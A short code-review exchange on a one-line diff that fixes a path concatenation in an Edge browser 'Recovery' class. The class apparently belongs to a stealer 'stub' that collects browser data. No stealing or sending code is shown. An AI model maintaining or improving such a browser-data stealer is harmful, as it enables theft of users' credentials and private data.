Stub/Target/Browsers/Edge/Edge.cs

```diff
@@ -8,7 +8,8 @@ internal sealed class Recovery
     {
         public static void Run(string sSavePath)
         {
-            var sFullPath = Paths.Lappdata + Paths.EdgePath;
+            //Paths.Lappdata + Paths.EdgePath is a typo
+            var EFullPath = Paths.Lappdata + "\\"+Paths.EdgePath;
```

Comment:
```suggestion
            var sFullPath = Paths.Lappdata + "\\"+Paths.EdgePath;
```

Thanks for the fix but you made your own typo at `EFullPath`
it should be `sFullPath`

No correction needed as i already pushed the fix

Thanks again!